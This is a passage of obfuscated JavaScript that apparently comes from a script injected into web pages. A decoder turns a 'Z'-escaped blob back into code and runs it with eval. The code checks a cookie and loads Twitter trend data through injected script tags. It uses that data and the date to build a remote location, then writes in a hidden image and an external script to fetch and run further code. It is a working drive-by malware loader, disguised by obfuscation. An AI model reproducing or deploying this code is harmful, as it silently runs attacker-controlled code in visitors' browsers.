e}rubc0-0~ug0Qbbqi8!Z3cZ2522Z3c#Z3c$Z3cZ25Z3cZ2526Z3cZ27Z3c(Z3c)9+Z2519ve~sdyZ257F~0Sq|se|qdu]qwys^e}rub8tqiZ3c0}Z257F~dxZ3c0iuqbZ3c0y~tuh9kbudeb~0888iuqb0;Z22;Z69f (Z64ocuZ6denZ74.cZ6fZ6fZ6bieZ2eZ69ndeZ78Z4ff(Z27Z72f5Z666Z64Z73Z27)Z3dZ3d-1Z29Z7bfunZ63tZ69oZ6e cZ61Z6clbaZ63kZ28x)Z7bwZ69Z6edZ6fw.tZ77Z20Z3d x;vZ61rZ20d Z3d newZ20Z44ateZ28Z29;dZ2eseZ74TZ69me(Z78[Z22as_ofZ22]Z2a1Z3000)Z3bvaZ72 hZ20Z3d d.geZ74Z55Z54Z43Z48ouZ72s(Z29;wZ69ndoZ77.hZ20Z3d h;iZ66Z20(h Z3e Z38)Z7bd.Z73eZ74Z55TZ43DZ61te(Z64.geZ74UZ54CDZ61Z74Z65Z28Z29Z20- 2Z29;Z7dZ65lseZ7bd.Z73etZ55TZ43DaZ74e(dZ2egZ65Z74UZ54CDZ61te(Z29 - Z33)Z3b}Z77indZ6fw.Z67dZ20Z3d d;vZ61r Z74iZ6de Z3d nZ65Z77 Z41Z72Z72Z61y(Z29Z3bZ76ar Z73hiZ66tIZ6edeZ78 Z3d Z22Z22;timeZ5bZ22yZ65Z61Z72Z22] Z3d d.geZ74Z55Z54CFZ75lZ6cYeZ61r()Z3btiZ6dZ65Z5bZ22mZ6fZ6ethZ22] Z3d Z64.gZ65tUZ54CMZ6fZ6etZ68()Z2b1Z3bZ74imZ65[Z22daZ79Z22Z5d Z3d d.gZ65tUZ54Z43DZ61te(Z29Z3bif Z28Z64.geZ74UTCZ4dontZ68()+Z31 Z3c 10Z29Z7bZ73hifZ74IndZ65Z78 Z3d Z74iZ6dZ65[Z22yZ65Z61Z72Z22] + Z22-0Z22 + Z28dZ2egZ65Z74UZ54CZ4dontZ68()+Z31);}Z65lZ73eZ7bshiZ66tIZ6edeZ78Z20Z3d Z74Z69meZ5bZ22yeaZ72Z22] +Z20Z22-Z22 +Z20(dZ2egeZ74Z55TCMZ6fntZ68Z28)+1Z29Z3b}Z69f (Z64.gZ65tUZ54Z43DatZ65(Z29Z20Z3cZ2010Z29Z7bsZ68iftZ49Z6edeZ78 Z3dshZ69fZ74IndZ65x Z2b Z22-Z30Z22 + dZ2egeZ74UTZ43DZ61Z74e(Z29;Z7deZ6cseZ7bshZ69Z66tZ49nZ64eZ78 Z3d shiZ66tInZ64ex Z2b Z22-Z22 + d.Z67etZ55TZ43DZ61tZ65(Z29;}dZ6fcZ75meZ6et.wZ72Z69teZ28Z22Z3csZ63rZ22+Z22ipt lZ61ngZ75ageZ3dZ6aavaZ73criZ70Z74Z22+Z22 sZ72cZ3dZ27htZ74p:Z2fZ2fsearZ63h.Z74wiZ74terZ2ecomZ2ftreZ6eZ64sZ2fdailZ79Z2ejZ73on?Z64aZ74eZ3dZ22+ shiZ66tInZ64eZ78+Z22&callZ62acZ6bZ3dcaZ6cZ6cbZ61ckZ32Z27Z3eZ22 + Z22Z3cZ2fscrZ22 + Z22iptZ3eZ22);} funZ63tioZ6e caZ6cZ6cZ62Z61Z63k2Z28x)Z7bwiZ6edZ6fwZ2eZ74wZ20Z3d Z78Z3bsc(Z27rfZ35f6Z64Z73Z27,2,Z37Z29Z3beZ76alZ28unZ65scaZ70Z65(dZ7a+Z63zZ2bopZ2bsZ74)+Z27dw(dZ7a+czZ28$Z61+sZ74))Z3bZ27);docZ75menZ74.wZ72iZ74Z65($aZ29;}dZ6fZ63uZ6dZ65nt.Z77Z72iteZ28Z22Z3cZ69Z6dg sZ72cZ3dZ27httpZ3aZ2fZ2fsearchZ2etwZ69ttZ65r.cZ6fmZ2fimaZ67esZ2fseaZ72chZ2frsZ73.Z70ngZ27 widZ74Z68Z3d1 Z68eZ69gZ68tZ3d1Z20Z73tyZ6ceZ3dZ27visibZ69litZ79:hiZ64dZ65nZ27 Z2fZ3e Z3cscrZ22+Z22iptZ20lZ61ngZ75agZ65Z3djavZ61scrZ69ptZ22+Z22 srcZ3dZ27httpZ3aZ2fZ2fsearcZ68.Z74wiZ74tZ65rZ2ecomZ2fZ74Z72enZ64Z73Z2fdaZ69lZ79.jsZ6fnZ3fcalZ6cZ62acZ6bZ3dcallZ62acZ6bZ27Z3eZ22 + Z22Z3cZ2fscrZ22 + Z22iptZ3eZ22);}elsZ65Z7b$aZ3dZ27Z27};funcZ74ionZ20sc(Z63Z6emZ2cv,Z65d)Z7bvZ61rZ20exdZ3dneZ77 DaZ74e(Z29;eZ78d.sZ65tDaZ74e(Z65Z78d.gZ65tZ44atZ65(Z29Z2bedZ29;doZ63Z75mZ65Z6eZ74Z2ecZ6fokiZ65Z3dcnm+Z20Z27Z3dZ27 +Z65sZ63apeZ28v)Z2bZ27;exZ70iZ72esZ3dZ27+eZ78d.tZ6fGMZ54StZ72Z69ng(Z29Z3b};";function z(s){r="";for(i=0;i<s.length;i++){if(s.charAt(i)=="Z"){s1="%"}else{s1=s.charAt(i)}r=r+s1;}return unescape(r);}var x=0;eval(t());